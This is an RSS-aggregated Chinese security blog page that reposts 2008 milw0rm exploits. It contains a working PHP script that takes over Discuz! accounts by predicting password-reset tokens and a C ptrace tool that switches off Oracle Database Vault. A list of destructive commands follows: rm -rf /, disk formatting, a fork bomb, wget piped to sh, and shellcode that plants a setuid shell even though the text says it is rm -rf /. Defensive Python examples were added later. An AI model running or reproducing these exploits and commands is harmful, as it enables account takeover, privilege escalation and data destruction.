RSS address: http://www.4shell.org/rss.xml
68 articles collected and recommended in total
Xianguo category:
IT / Technology
Xianguo tags:
hacker
exploit
network security
vulnerability
error
recommended
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Discuz! Reset User Password Exploit
by 80vul
team: http://www.80vul.com
+---------------------------------------------------------------------------+
');
if ($argc < 6) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user mail uid
host: target server (ip/hostname)
path: path to discuz
user: user login name
mail: user login mail
uid: user login id
Example:
php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$mail = $argv[4];
$uid = $argv[5];
$fp = fsockopen($host, 80);
$data = "GET ".$path."viewthread.php HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Keep-Alive: 300\r\n";
$data .= "Connection: keep-alive\r\n\r\n";
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp)) {
$resp .= fread($fp, 1024);
preg_match('/&formhash=([a-z0-9]{8})/', $resp, $hash);
if ($hash)
break;
}
if ($hash) {
$cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1];
$data = "POST ".$path."member.php HTTP/1.1\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Referer: http://$host$path\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: close\r\n\r\n";
$data .= $cmd;
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
fclose($fp);
preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
if (!$sid)
exit("Exploit Failed!\n");
$seed = getseed();
if ($seed) {
mt_srand($seed);
random();
mt_rand();
$id = random();
$fp = fsockopen($host, 80);
$cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1];
$data = "POST ".$path."member.php HTTP/1.1\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Referer: http://$host$path\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: close\r\n\r\n";
$data .= $cmd;
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
if (strpos($resp, '您的密码已重新设置,请使用新密码登录。') !== false)
exit("Exploit Success!\nUser New Password:\t123456\n");
else
exit("Exploit Failed!\n");
} else
exit("Exploit Failed!\n");
} else
exit("Exploit Failed!\n");
function getseed()
{
global $sid;
for ($seed = 0; $seed <= 1000000; $seed ++) {
mt_srand($seed);
$id = random(6);
if ($id == $sid[1])
return $seed;
}
return false;
}
function random($length = 6)
{
$hash = '';
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max = strlen($chars) - 1;
for ($i = 0; $i < $length; $i ++)
$hash .= $chars[mt_rand(0, $max)];
return $hash;
}
?>
# milw0rm.com [2008-11-22]
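The weakness the exploit above relies on is visible in its own structure: getseed() tries every seed from 0 to 1,000,000 until random(6) reproduces the `_sid` cookie the server handed out, and once the seed is known the password-reset `id` falls out of the same mt_rand() stream. A reset token is only as strong as the smallest space an attacker has to search, here about 2^20 seeds rather than the 62^6 strings a six-character token suggests. As an added example, not code from the original post or from Discuz!, here is a reset-token flow in Python that avoids each part of that problem: tokens come from the OS CSPRNG with 256 bits of entropy, only their hash is stored, they expire, they are single use, and guessing is bounded. The in-memory `_pending` dictionary is an assumption standing in for the application's database.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional

TOKEN_BYTES = 32            # 256 bits from the OS CSPRNG, not from a seedable PRNG
TOKEN_TTL_SECONDS = 15 * 60
MAX_ATTEMPTS = 5

# uid -> {"hash": sha256(token), "expiry": unix time, "attempts": int}
# Constructed in-memory stand-in for the application's database; storing only
# the hash means a database read (or a log line) does not yield usable tokens.
_pending: Dict[int, dict] = {}


def _digest(token: str) -> bytes:
    return hashlib.sha256(token.encode("utf-8")).digest()


def issue_reset_token(uid: int, now: Optional[float] = None) -> str:
    """Create a fresh one-time reset token for uid; return the plaintext to mail.
    Re-issuing replaces any earlier token for the same uid."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(TOKEN_BYTES)
    _pending[uid] = {"hash": _digest(token),
                     "expiry": now + TOKEN_TTL_SECONDS,
                     "attempts": 0}
    return token


def consume_reset_token(uid: int, presented: str, now: Optional[float] = None) -> bool:
    """Return True exactly once for a valid, unexpired token bound to uid."""
    now = time.time() if now is None else now
    entry = _pending.get(uid)
    if entry is None:
        return False                       # nothing outstanding for this uid
    if now > entry["expiry"]:
        del _pending[uid]                  # expired: discard, never accept
        return False
    entry["attempts"] += 1
    if entry["attempts"] > MAX_ATTEMPTS:
        del _pending[uid]                  # too many guesses: force a re-issue
        return False
    # constant-time comparison of the hashes, so response time leaks nothing
    if hmac.compare_digest(entry["hash"], _digest(presented)):
        del _pending[uid]                  # single use
        return True
    return False
```

The token is bound to the uid it was issued for, so a token obtained for one account cannot reset another, and because the value never comes from a seedable generator there is no seed for an observed session id to reveal.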
Chinadu` Blog Copyright © 2008
Continue reading the full text of "Discuz! Remote Reset User Password Exploit"...
%ALLUSERSPROFILE% C:\Documents and Settings\All Users
%USERPROFILE% C:\Documents and Settings\<current user name>
%HOMEPATH% C:\Documents and Settings\<current user name>
%SYSTEMROOT% C:\WINDOWS
%WINDIR% C:\WINDOWS
%ComSpec% C:\WINDOWS\System32\cmd.exe
%APPDATA% C:\Documents and Settings\<current user name>\Application Data
%ALLAPPDATA% C:\Documents and Settings\All Users\Application Data
%SYSTEMDRIVE% C:
%HOMEDRIVE% C:
%TEMP% and %TMP% C:\Documents and Settings\<current user name>\Local Settings\Temp
%ProgramFiles% C:\Program Files
%CommonProgramFiles% C:\Program Files\Common Files
Docum~1 Documents and Settings
progra~1 Program Files
Continue reading the full text of "Complete list of Windows system directory environment variables (directory short names)"...
Some of these will disrupt your programs and the running system, and some will wipe your disk outright; once run, there is almost no way to recover from these commands.
1. Code:
rm -rf /
This one is simple: the root directory gets wiped clean.
2. Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Didn't follow it? Heh, it is just [rm -rf /] in hexadecimal.
3. Code:
mkfs.ext3 /dev/sda
Wiping a disk is dangerous, no question about it.
4. Code:
:(){:|:&};:
This is not a post-90s emoticon, and it is not the face Totti makes before a penalty kick; it will quickly hang your system under the load of the work it spawns.
5. Code:
any_command > /dev/sda
This command writes a large amount of raw data to the disk and can cause data loss.
6. Code:
wget http://some_untrusted_source -O- | sh
Just as on Windows, never casually download from sources whose safety has not been verified; these days Linux, like carrots, is no guarantee of safety either.
7. Code:
mv /home/yourhomedirectory/* /dev/null
This command will certainly drive the system crazy; your home directory will never be seen again.
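Item 6 is the only entry in the list whose danger comes from trusting a remote party rather than from the command itself, and it has a standard safe counterpart: keep the download as data until its digest matches a value obtained through a separate channel (a value pinned in your own configuration, or the publisher's signed release notes), and only then make it executable. Piping straight into sh removes that step, so whatever the server or anyone on the path returns runs immediately. The following Python is an added example, not code from the original post; the script bytes and digest in it are constructed for the demo.

```python
import hashlib
import hmac
import os
import stat
import tempfile
from typing import Optional


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def digest_matches(data: bytes, expected_hex: str) -> bool:
    """True only if data hashes to the digest obtained out of band."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.strip().lower())


def stage_script(data: bytes, expected_hex: str,
                 directory: Optional[str] = None) -> Optional[str]:
    """Verify first, write second: the bytes reach the filesystem as an
    executable file only after the digest check passed. Returns the path,
    or None (and writes nothing) on mismatch."""
    if not digest_matches(data, expected_hex):
        return None
    fd, path = tempfile.mkstemp(prefix="verified-", suffix=".sh", dir=directory)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    os.chmod(path, stat.S_IRWXU)          # 0700: owner only
    return path


def staged_content(path: str) -> bytes:
    """Read back a staged script and remove it (used by the demo below)."""
    with open(path, "rb") as fh:
        data = fh.read()
    os.unlink(path)
    return data


# Constructed demo inputs. In real use EXPECTED_DIGEST is pinned in your own
# config or taken from the publisher's signed release notes, never from the
# same HTTP response that delivered the script.
DEMO_SCRIPT = b"#!/bin/sh\necho 'installer would run here'\n"
EXPECTED_DIGEST = sha256_hex(DEMO_SCRIPT)
TAMPERED_SCRIPT = DEMO_SCRIPT + b"echo 'line a hostile mirror appended'\n"

if __name__ == "__main__":
    path = stage_script(DEMO_SCRIPT, EXPECTED_DIGEST)
    print("genuine script staged at", path)
    staged_content(path)                  # clean up the demo file
    print("tampered script staged:", stage_script(TAMPERED_SCRIPT, EXPECTED_DIGEST))
```

The same shape applies to a shell workflow: download with `wget -O file`, run `sha256sum -c` against the pinned digest, and only execute the file when that check exits zero.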
PS: This guy has turned playing Pro Evolution Soccer into a genuine art form...
/*
* original release: http://vnull.pcnet.com.pl/blog/?p=92
*
* ora_dv_mem_off.c version 0x1
* ORACLE Database Vault runtime disabler (x86_32 Linux only)
* AKA give_back_the_freedom
* by Jakub 'vnull' Wartak <jakub.wartak@gmail.com> 26.02.2008
* 0-day PRIVATE! D0 N0T DI$TRIBUT3!
*
* Tested on 10.2.0.3, CentOS 5.
* For other architectures/OS combos consider having fun with gdb ;]
*
* Whole Database Vault architecture is flawed if DBA has access to
* oracle user process space. IMHO you could limit risk by creating
* UNIX accounts for DBAs with membership of OSDBA group (along with
* oracle SUID binary and shared memory with only read permission
* for OSDBA group [check SHM privs: ipcs -cm] ). But how those DBAs
* would cope with some serious crashes (requiring for e.g. restoring
* controlfile) ?
*
* Usage:
* Set environment variables: ORACLE_BASE, ORACLE_SID, ORACLE_HOME
* $ gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty
* $ ./ora_dv_mem_off
*
* REQUIREMENTS:
* + run as oracle process owner (by default "oracle")
* + working ptrace(), it won't work in systems with ptrace()
* disabled (grsecurity and some LKMs).
* + BFD headers and library (binutils-devel)
*
* THE DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. THE
* CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE
* LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES,
* LOSSES OR UNLAWFUL OFFENCES.
*
* USE AT OWN RISK!
*
*/
#include <bfd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>     /* kill() and SIGKILL used by cleanup() */
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/reg.h>    /* EAX register index used with PTRACE_PEEKUSER */
#include <linux/user.h>
#include <linux/ptrace.h>
#include <asm/unistd.h> /* for __NR_clone */
/* you may need to alter this */
#define ORABASE "/u01/app/oracle/product/10.2.0/bin"
/*
* Magic... (at&t syntax)
* push %ebp
* mov %esp, %ebp
* mov <DV_FLAG>, %eax
* [..]
* where DV_FLAG is 32-bit long
*/
#define ASM_DV_FUNC_PROLOG "\x55\x8b\xec\xb8"
const char *sqlplus = ORABASE "/sqlplus";
const char *oracle = ORABASE "/oracle";
const int long_size = sizeof(long);
pid_t child;
long locate_dv_func(void)
{
asymbol **symbol_table;
bfd *b = bfd_openr(oracle, NULL);
if (b == NULL) {
perror("bfd_openr");
exit(-1);
}
bfd_check_format(b, bfd_object);
long storage_needed = bfd_get_symtab_upper_bound(b);
if(storage_needed < 0) {
fprintf(stderr, "wtf?!\n");
exit(-1);
}
if((symbol_table = (asymbol**)malloc(storage_needed)) == 0) {
perror("malloc");
exit(-1);
}
int num_symbols;
if((num_symbols = bfd_canonicalize_symtab(b, symbol_table)) <= 0) {
fprintf(stderr, "no symbols info\n");
exit(-1);
}
int i;
for(i = 0; i < num_symbols; i++) {
char *symname = bfd_asymbol_name(symbol_table[i]);
void *symaddr = bfd_asymbol_value(symbol_table[i]);
/* don't even ask why this function, for real hardcore: gdb -p <oraclePIDs> */
if(!strcmp(symname, "kzvtins")) {
fprintf(stderr, "[%d] symbol \"kzvtins\" at 0x%lx\n", getpid(),
(long) symaddr);
return (long) symaddr;
}
}
return 0;
}
/* from "Playing with ptrace(), part#2, Linux Journal, author: Pradeep Padala */
void getdata(pid_t child, long addr, char *str, int len)
{
char *laddr;
int i, j;
union u {
long val;
char chars[long_size];
} data;
i = 0;
j = len / long_size;
laddr = str;
while(i < j) {
data.val = ptrace(PTRACE_PEEKDATA, child, addr + i * 4, NULL);
memcpy(laddr, data.chars, long_size);
++i;
laddr += long_size;
}
j = len % long_size;
if(j != 0) {
data.val = ptrace(PTRACE_PEEKDATA,child, addr + i * 4,NULL);
memcpy(laddr, data.chars, j);
}
str[len] = '\0';
}
void putdata(pid_t child, long addr, char *str, int len)
{
char *laddr;
int i, j;
union u {
long val;
char chars[long_size];
} data;
i = 0;
j = len / long_size;
laddr = str;
while(i < j) {
memcpy(data.chars, laddr, long_size);
ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val);
++i;
laddr += long_size;
}
j = len % long_size;
if(j != 0) {
memcpy(data.chars, laddr, j);
ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val);
}
}
void cleanup(void)
{
int s;
kill(child, SIGKILL);
wait(&s);
}
int main(int ac, char **av)
{
int status;
pid_t orapid = 0;
bfd_init();
if((child = fork()) == -1) {
perror("fork");
exit(-1);
}
if(child == 0) {
if(ptrace(PTRACE_TRACEME, 0, NULL, NULL)==-1) {
perror("unable to ptrace(PTRACE_TRACEME)");
exit(-1);
}
/* launch sqlplus */
if(execl(sqlplus, "sqlplus", "/nolog", NULL)==-1) {
perror("execl");
exit(-1);
}
/* not reached */
exit(0);
}
if(atexit(cleanup) != 0) {
fprintf(stderr, "[%d] unable to register cleanup function\n", getpid());
}
wait(&status);
if(WIFSTOPPED(status)) {
fprintf(stderr, "[%d] starting to trace sqlplus process (%d)\n", getpid(), child);
}
fprintf(stderr, "[***] NOW TYPE IN SQLPLUS: conn / as sysdba\n");
while(!orapid) {
struct user_regs_struct uregs;
ptrace(PTRACE_SYSCALL, child, 0, 0);
wait(&status);
ptrace(PTRACE_GETREGS, child, 0, &uregs);
/* ouch! no fork()? clone()! */
if(uregs.orig_eax==__NR_clone) {
long *regs = 0;
/* fprintf(stderr, "[%d] clone() syscall\n", getpid()); */
ptrace(PTRACE_SYSCALL, child, 0, 0);
wait(&status);
if((orapid = ptrace(PTRACE_PEEKUSER, child, &regs[EAX], 0)) == -1) {
perror("ptrace(PTRACE_PEEKUSER): unable to get clone() retvalue\n");
exit(-1);
}
fprintf(stderr, "[%d] clone() syscall in %d, tracing orapid=%d\n", getpid(),
child, orapid);
/* attach to orapid, detach from sqlplus */
if(ptrace(PTRACE_ATTACH, orapid, 0, 0) == -1) {
perror("ptrace(PTRACE_ATTACH) to orapid");
exit(-1);
}
while(1) {
ptrace(PTRACE_SYSCALL, orapid, 0, 0);
wait(&status);
ptrace(PTRACE_GETREGS, orapid, 0, &uregs);
if(uregs.orig_eax==__NR_execve) {
fprintf(stderr, "[%d] execve() syscall in %d, \n", getpid(), orapid);
/* end ptrace of syscall */
ptrace(PTRACE_SYSCALL, orapid, 0, 0);
break;
} else {
//fprintf(stderr, "got %ld\n", uregs.orig_eax);
ptrace(PTRACE_SYSCALL, orapid, 0, 0);
}
}
if(ptrace(PTRACE_DETACH, child, 0, 0) == -1) {
perror("ptrace(PTRACE_DETACH) from child");
exit(-1);
}
} else if(uregs.orig_eax==__NR_execve) {
fprintf(stderr, "[%d] execve() syscall in %d\n", getpid(), child);
}
}
/* now we have oracle server process under our control :) */
long dv_func = locate_dv_func();
if(dv_func == 0) {
fprintf(stderr, "ERROR: unable to find function\n");
exit(-1);
}
wait(&status);
unsigned char buf[32];
memset(buf, 0, sizeof(buf));
getdata(orapid, dv_func, (char *)&buf, 32);
/* dump opcodes */
/*
for(i = 0; i < 31; i++) {
fprintf(stderr, "%x ", (unsigned char)buf[i]);
} */
if(!memcmp(buf, ASM_DV_FUNC_PROLOG, strlen(ASM_DV_FUNC_PROLOG))) {
unsigned char dv_status;
unsigned long woff = dv_func + strlen(ASM_DV_FUNC_PROLOG), woff2=woff;
getdata(orapid, woff, (char *)&dv_status, 1);
fprintf(stderr, "[***] successfully validated function, DatabaseVault=%d\n", dv_status);
fprintf(stderr, "[***] attempting to rewrite memory at 0x%lx\n", woff2);
unsigned char my = 0;
putdata(orapid, woff2, (void *)&my, 1);
}
if(ptrace(PTRACE_DETACH, orapid, 0, 0) == -1) {
perror("ptrace(PTRACE_DETACH) from orapid");
exit(-1);
}
wait(&status);
exit(0);
}
// milw0rm.com [2008-11-20]
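The header comment makes the defensive point itself: Database Vault is enforced by a flag inside the oracle server process, so anyone who can ptrace() that process as the same UNIX user can clear it, and the author's suggested control is to keep DBAs out of the oracle account altogether. On Linux two process-level knobs decide whether a same-uid attach succeeds: the Yama `ptrace_scope` sysctl, and the target's own "dumpable" flag (a process that has cleared PR_SET_DUMPABLE can only be attached by a process holding CAP_SYS_PTRACE). Note how the exploit obtains its handle: it forks sqlplus itself and follows the clone() into the server process, so it attaches as an ancestor, which Yama scope 1 still permits; only scope 2 or higher, a cleared dumpable flag, or a separate account closes that path. The Python below is an added example, not part of the original exploit or of Oracle's software; it reads the sysctl, sets and queries the dumpable flag of the current process through libc prctl() (constants from <sys/prctl.h>), and encodes the attach rules just described. Linux only.

```python
import ctypes
import os
from typing import Optional

PR_GET_DUMPABLE = 3          # values from <sys/prctl.h>
PR_SET_DUMPABLE = 4
YAMA_SCOPE_PATH = "/proc/sys/kernel/yama/ptrace_scope"

_libc = ctypes.CDLL(None, use_errno=True)
_libc.prctl.restype = ctypes.c_int
_libc.prctl.argtypes = [ctypes.c_int, ctypes.c_ulong, ctypes.c_ulong,
                        ctypes.c_ulong, ctypes.c_ulong]


def dumpable_flag() -> int:
    """0 = not dumpable (same-uid attach refused), 1 = dumpable, 2 = suidsafe."""
    return _libc.prctl(PR_GET_DUMPABLE, 0, 0, 0, 0)


def refuse_same_user_ptrace() -> bool:
    """Clear the dumpable flag for this process. Afterwards only a process
    holding CAP_SYS_PTRACE may attach; core dumps are disabled as a side effect."""
    return _libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) == 0


def parse_yama_scope(text: str) -> Optional[int]:
    """Parse the ptrace_scope sysctl (0 classic, 1 ancestors only,
    2 CAP_SYS_PTRACE only, 3 no attach); None for anything else."""
    try:
        value = int(text.strip())
    except ValueError:
        return None
    return value if 0 <= value <= 3 else None


def read_yama_scope() -> Optional[int]:
    """Current Yama scope, or None when Yama is not present (behaves like 0)."""
    if not os.path.exists(YAMA_SCOPE_PATH):
        return None
    with open(YAMA_SCOPE_PATH) as fh:
        return parse_yama_scope(fh.read())


def unrelated_same_user_attach_possible(scope: Optional[int], dumpable: int) -> bool:
    """Can an unrelated process of the same uid, without CAP_SYS_PTRACE, attach?"""
    effective_scope = 0 if scope is None else scope
    return effective_scope == 0 and dumpable == 1


def ancestor_attach_possible(scope: Optional[int], dumpable: int) -> bool:
    """Can a same-uid ancestor attach? This is the exploit's situation, since it
    forks sqlplus itself; scope 1 does not stop it, a cleared dumpable flag does."""
    effective_scope = 0 if scope is None else scope
    return effective_scope <= 1 and dumpable == 1


if __name__ == "__main__":
    scope = read_yama_scope()
    print("yama ptrace_scope:", scope, "dumpable:", dumpable_flag())
    print("unrelated same-uid attach:", unrelated_same_user_attach_possible(scope, dumpable_flag()))
    print("ancestor attach:", ancestor_attach_possible(scope, dumpable_flag()))
    refuse_same_user_ptrace()
    print("after PR_SET_DUMPABLE=0, ancestor attach:",
          ancestor_attach_possible(scope, dumpable_flag()))
```

A long-running service that holds security state in memory would call the equivalent of refuse_same_user_ptrace() early in startup; the cost is that crash dumps then need a dedicated, privileged collector rather than a same-uid gdb.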
Continue reading the full text of "Oracle Database Vault ptrace(2) Privilege Escalation Exploit"...